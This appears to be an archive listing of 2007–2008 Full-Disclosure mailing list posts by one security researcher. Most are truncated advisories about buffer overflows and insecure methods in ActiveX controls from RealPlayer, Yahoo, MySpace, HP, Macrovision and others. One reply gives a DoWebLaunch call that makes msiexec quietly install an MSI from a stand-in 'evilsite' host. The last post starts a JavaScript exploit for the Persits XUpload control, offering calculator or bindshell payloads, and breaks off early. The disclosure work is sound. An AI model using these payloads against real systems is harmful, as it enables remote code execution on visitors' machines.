-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who: Real Networks http://www.real.com What: Real Networks Real Player is a popular media player. How: Real Player utilizes an ActiveX control to play content within the user's browser. rmoc3260.dll version 6.0.10.45 {2F542A2E-EDC9-4BF7-8CB1-87C9919F

[Full-disclosure] Move Networks Quantum Streaming Player UploadLogs() Buffer Overflow

2008-02-25 Thread Elazar Broad
Who: Move Networks http://www.movenetworks.com/ What: Move Networks is a streaming media provider whose clients include Fox, ABC, ESPN etc. They employ an ActiveX control to display content in the client's browser. How: qsp2ie07074039.dll version 7.7.

[Full-disclosure] round and round they go

2008-02-21 Thread Elazar Broad
http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yahoo! JukeBox MediaGrid ActiveX Control AddBitmap() Buffer Overflow

2008-02-03 Thread Elazar Broad
Who: Yahoo! http://www.yahoo.com What: mediagrid.dll version 2.2.2.56 {22FD7C0A-850C-4A53-9821-0B0915C96139} Implements IObjectSafety This control is used with the Yahoo! JukeBox application. How: The 2nd parameter of the AddBitmap() method is vulnerable to a buffer overflow. Fix: No official

[Full-disclosure] FaceBook/Aurigma Image/PhotoUploader Buffer Overflow

2008-02-03 Thread Elazar Broad
Who: FaceBook http://www.facebook.com Aurigma http://www.aurigma.com What: FaceBook uses Aurigma's ImageUploader control. This control enables users to upload photos to FaceBook. How: Please note that this vulnerability is DIFFERENT than the one that I previously posted. This also affects the

[Full-disclosure] MySpace Uploader ActiveX Control Buffer Overflow

2008-01-31 Thread Elazar Broad
Who: MySpace http://www.myspace.com What: MySpace repackages Aurigma's ImageUploader ActiveX. This control enables MySpace users to upload images to their MySpace page(s). How: MySpaceUploader.ocx version 1.0.0.4 {48DD0448-9209-4F81-9F6D-D83562940134} This control is vulnerable to a buffer over

[Full-disclosure] Move Networks Upgrade Manager QMPUpgrade.dll Buffer Overflow

2008-01-26 Thread Elazar Broad
Who: Move Networks http://www.movenetworks.com/ What: Move Networks Quantum Streaming Player Upgrade Manager How: QMPUpgrade.dll version 1.0.0.1 {6054D082-355D-4B47-B77C-36A778899F48} QMPUpgrade.dll is packaged with an older version of the Quantum player. The player itself has several vulnerabi

[Full-disclosure] HP Virtual Rooms WebHPVCInstall Control Multiple Buffer Overflows

2008-01-21 Thread Elazar Broad
Who: Hewlett-Packard What: HP Virtual Rooms is a suite of online collaboration, training and support tools. How: HP uses an ActiveX control to install the Virtual Rooms client. Several properties including AuthenticationURL, PortalAPIURL, cabroot are vulnerable to a buffer overflow. hpvirtual

Re: [Full-disclosure] Hardware-based full disk encryption

2008-01-16 Thread Elazar Broad
Cryptsetup with LUKS is an option, you could build a custom kernel and initrd and put it on a UFD... Elazar On Wed, 16 Jan 2008 10:38:37 -0500 coderman <[EMAIL PROTECTED]> wrote: >On Jan 16, 2008 4:53 AM, Frank Sanders <[EMAIL PROTECTED]> >wrote: >> Can any one recommend such system ? > >ingre

Re: [Full-disclosure] Macrovision FlexNet Connect DownloadManager Insecure Methods

2008-01-15 Thread Elazar Broad
e) on Milw0rm, exploiting this is pretty self explanatory though... Elazar On Mon, 14 Jan 2008 19:51:22 + Elazar Broad <[EMAIL PROTECTED]> wrote: >Who: >Macrovision > >What: >Macrovision FlexNet Connect is a software package that allows >ISV's to update their software products. It is generally used in >conjunction with the I

Re: [Full-disclosure] Macrovision FlexNet Connect DownloadManager Insecure Methods

2008-01-14 Thread Elazar Broad
system. On Mon, 14 Jan 2008 14:51:22 -0500 Elazar Broad <[EMAIL PROTECTED]> wrote: >Who: >Macrovision > >What: >Macrovision FlexNet Connect is a software package that allows >ISV's to update their software products. It is generally used in >conjunction with the I

[Full-disclosure] Macrovision FlexNet Connect DownloadManager Insecure Methods

2008-01-14 Thread Elazar Broad
Who: Macrovision What: Macrovision FlexNet Connect is a software package that allows ISV's to update their software products. It is generally used in conjunction with the InstallShield software deployment framework. FlexNet uses a number of ActiveX controls, some of which are marked safe for

[Full-disclosure] StreamAudio ChainCast ProxyManager ccpm_0237.dll Buffer Overflow

2008-01-11 Thread Elazar Broad
Who: http://www.streamaudio.com StreamAudio (formerly ChainCast) provides streaming media for radio broadcasters. What: StreamAudio utilizes an Active control that acts as a proxy between StreamAudio and Windows Media Player which actually plays the content. This control is marked as follo

Re: [Full-disclosure] Gateway WebLaunch ActiveX Control Insecure Method

2008-01-09 Thread Elazar Broad
I was playing with this a bit more. Everybody has the Windows Installer installed, right? How about this: obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i http://www.evilsite.com/evilapp.msi /quiet"); Elazar On Tue, 08 Jan 2008 20:08:53 -0500 [EMAIL PROTECTED] wrote:

[Full-disclosure] Persits Software XUpload Control AddFolder() Buffer Overflow Exploit

2007-12-28 Thread Elazar Broad
I took a shot at writing an exploit for this, so here goes. Choice of WinExec(the calculator, what else?) or a bindshell. --- Persits Software XUpload Control AddFolder BoF Exploit function Check() { var buf = 'A'; while (buf.length <= 1387) buf
